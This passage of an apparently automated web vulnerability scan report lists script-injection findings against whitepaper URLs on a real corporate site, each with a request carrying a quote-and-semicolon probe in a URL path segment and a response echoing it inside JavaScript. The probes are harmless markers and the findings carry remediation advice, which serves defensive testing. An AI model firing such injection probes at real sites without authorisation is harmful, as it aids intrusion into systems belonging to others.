The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91611'%3b3ca715f4d40 was submitted in the REST URL parameter 1. This input was echoed as 91611';3ca715f4d40 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources91611'%3b3ca715f4d40/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40706
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources91611';3ca715f4d40/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.833. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b757"%3bc538dbc867b was submitted in the REST URL parameter 2. This input was echoed as 9b757";c538dbc867b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers9b757"%3bc538dbc867b/itsolutions/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers9b757";c538dbc867b/itsolutions/wp_cloud-computing_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.834. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea865'%3bfac23192987 was submitted in the REST URL parameter 2. This input was echoed as ea865';fac23192987 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapersea865'%3bfac23192987/itsolutions/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapersea865';fac23192987/itsolutions/wp_cloud-computing_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.835. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5d0d"%3b246f438c336 was submitted in the REST URL parameter 3. This input was echoed as a5d0d";246f438c336 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/itsolutionsa5d0d"%3b246f438c336/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:24 GMT
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/itsolutionsa5d0d";246f438c336/wp_cloud-computing_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.836. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a3eb'%3b32b8b4069a8 was submitted in the REST URL parameter 3. This input was echoed as 9a3eb';32b8b4069a8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/itsolutions9a3eb'%3b32b8b4069a8/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/itsolutions9a3eb';32b8b4069a8/wp_cloud-computing_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.837. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 615bd'%3b71db8f7f03c was submitted in the REST URL parameter 4. This input was echoed as 615bd';71db8f7f03c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf615bd'%3b71db8f7f03c HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:54 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40314
Date: Wed, 17 Nov 2010 00:05:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf615bd';71db8f7f03c'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.838. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3277"%3bfd78377c4db was submitted in the REST URL parameter 4. This input was echoed as a3277";fd78377c4db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdfa3277"%3bfd78377c4db HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40314
Date: Wed, 17 Nov 2010 00:05:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
rf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdfa3277";fd78377c4db";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.839. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35489"%3b39a80d1ef7b was submitted in the REST URL parameter 1. This input was echoed as 35489";39a80d1ef7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources35489"%3b39a80d1ef7b/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40750
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources35489";39a80d1ef7b/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SE
...[SNIP]...

1.840. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e72c'%3bfb035a42e8e was submitted in the REST URL parameter 1. This input was echoed as 9e72c';fb035a42e8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources9e72c'%3bfb035a42e8e/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:05:46 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40750
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources9e72c';fb035a42e8e/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.841. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e57e'%3b3d2eae4ffdb was submitted in the REST URL parameter 2. This input was echoed as 4e57e';3d2eae4ffdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers4e57e'%3b3d2eae4ffdb/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:06:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40362
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:06:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:06:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers4e57e';3d2eae4ffdb/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.842. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4098e"%3ba3c6992b4d0 was submitted in the REST URL parameter 2. This input was echoed as 4098e";a3c6992b4d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers4098e"%3ba3c6992b4d0/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40360
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers4098e";a3c6992b4d0/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.f
...[SNIP]...

1.843. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 584a4"%3b2cdfe1c57c0 was submitted in the REST URL parameter 3. This input was echoed as 584a4";2cdfe1c57c0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf584a4"%3b2cdfe1c57c0 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:06:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40360
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:06:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:06:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf584a4";2cdfe1c57c0";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.844. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

